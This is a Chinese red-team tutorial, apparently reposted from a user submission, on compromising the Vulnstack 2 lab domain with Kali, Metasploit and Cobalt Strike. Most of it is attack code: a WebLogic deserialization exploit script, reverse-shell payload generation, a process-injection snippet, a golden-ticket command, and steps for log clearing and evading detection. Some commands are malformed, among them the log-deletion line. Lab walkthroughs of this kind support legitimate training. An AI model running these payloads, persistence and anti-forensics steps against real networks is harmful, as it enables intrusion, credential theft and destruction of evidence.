保姆级教程:用VMware和Kali复现Vulnstack红日靶场2的完整渗透流程(附CS联动技巧)
红队实战进阶Kali与Cobalt Strike协同渗透Vulnstack靶场全解析环境配置与网络拓扑设计在开始渗透测试之前正确的环境搭建是成功的基础。不同于简单的虚拟机启动专业级红队演练需要精确模拟企业内网环境。我们采用三台靶机WEB服务器、PC终端、域控制器与Kali攻击机构建典型的单域多节点企业网络。关键网络参数配置# VMware虚拟网络编辑器设置示例 vmware-netcfg --set-nat-subnet 192.168.111.0/24 vmware-netcfg --set-vmnet1-subnet 10.10.10.0/24网络拓扑中需要特别注意NAT网络192.168.111.0/24模拟公网环境内网网段10.10.10.0/24模拟企业内网确保Kali能同时访问两个网段提示使用物理机作为跳板时建议禁用杀毒软件实时监控但保持网络防火墙开启以模拟真实环境自动化信息收集与漏洞扫描传统的手动扫描既耗时又容易遗漏关键信息。我们采用分层扫描策略结合Nmap脚本引擎实现高效侦查# 第一层快速存活检测 nmap -sn 192.168.111.0/24 -oN alive_hosts.txt # 第二层关键服务扫描 nmap -sS -p 80,443,445,3389,7001 --open -iL alive_hosts.txt -oN services_scan.txt # 第三层深度漏洞探测 nmap --script vuln -p 7001 192.168.111.80 -oN weblogic_vuln.txt针对WebLogic服务的扫描结果通常会显示多个CVE漏洞其中CVE-2017-10271反序列化漏洞是最常见的突破口。我们可以使用MSF的自动化验证模块use auxiliary/scanner/http/weblogic_deserialize_asyncresponseservice set RHOSTS 192.168.111.80 set RPORT 7001 run多阶段攻击载荷投递技术直接使用meterpreter反弹shell容易被安全设备检测。我们采用分阶段载荷投递技术初始入口通过WebLogic漏洞投递最小化Stager内存加载使用反射式DLL注入技术加载第二阶段载荷会话迁移将不稳定进程迁移到稳定进程如explorer.exe# MSFvenom生成隐蔽载荷 msfvenom -p windows/x64/meterpreter/reverse_https LHOST192.168.111.128 LPORT443 -f raw -o stage1.bin # 使用CertUtil进行载荷传输 certutil -encode stage1.bin stage1.txt注意现代EDR产品会监控CertUtil异常使用实际作战中建议使用合法的业务文件传输通道Cobalt Strike高级会话控制传统MSF到CS的会话派生存在稳定性问题。我们采用Beacon的SMB管道进行可靠传输步骤实现在CS创建SMB监听器配置MSF的payload_inject模块设置会话迁移参数# CS团队服务器配置示例 beacon spawnas ADMINISTRATOR Pssw0rd smb beacon inject 1472 x64 smb横向移动技术对比技术适用场景检测风险所需凭证PsExec域环境高管理员权限WMI单机环境中本地管理员SMBExec域环境低Hash传递DCOM特殊系统高本地管理员域渗透与权限维持实战获得域管理员权限后真正的挑战才开始。我们采用多维度权限维持方案黄金票据制作mimikatz # kerberos::golden /admin:ADMIN /domain:VULNSTACK.LOCAL /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:58e91a5c3c3e08b3d15d22d30f3f0e21 /ptt隐蔽后门部署计划任务SchTasks服务持久化SCWMI事件订阅日志清理技巧# 清除单条安全日志 wevtutil cl Security /r:4624防御规避与反取证策略专业红队必须考虑蓝队的检测能力。我们采用以下反制措施流量伪装使用域名的CDN IP作为C2服务器行为混淆注入合法进程如svchost.exe时间规避只在目标时区的工作时间活动痕迹消除使用内存执行避免磁盘写入// 进程注入代码片段示例 HANDLE hProcess OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID); LPVOID pRemoteCode VirtualAllocEx(hProcess, NULL, payloadSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); WriteProcessMemory(hProcess, pRemoteCode, payload, payloadSize, NULL); CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteCode, NULL, 0, NULL);工具链优化与自动化脚本高效渗透需要定制化工具组合。推荐以下优化方案MSF资源脚本# auto_exploit.rc workspace -a Vulnstack db_nmap -sn 192.168.111.0/24 use exploit/multi/misc/weblogic_deserialize_asyncresponseservice set RHOSTS 192.168.111.80 set LHOST 192.168.111.128 exploit -jCS插件集成Aggressor Script自动化攻击流程CNA脚本扩展功能自定义报告生成模板Bash自动化监控#!/bin/bash while true; do nc -lvnp 4444 | while read line; do case $line in scan) nmap -sS -p- 192.168.111.80 ;; exploit) msfconsole -r auto_exploit.rc ;; esac done done在多次实战测试中发现当目标系统安装有最新补丁时传统的反序列化漏洞利用可能失效。这时可以考虑使用XXE注入或SSRF漏洞作为替代入口点配合NetNTLM中继攻击获取初始立足点。
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2458358.html
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!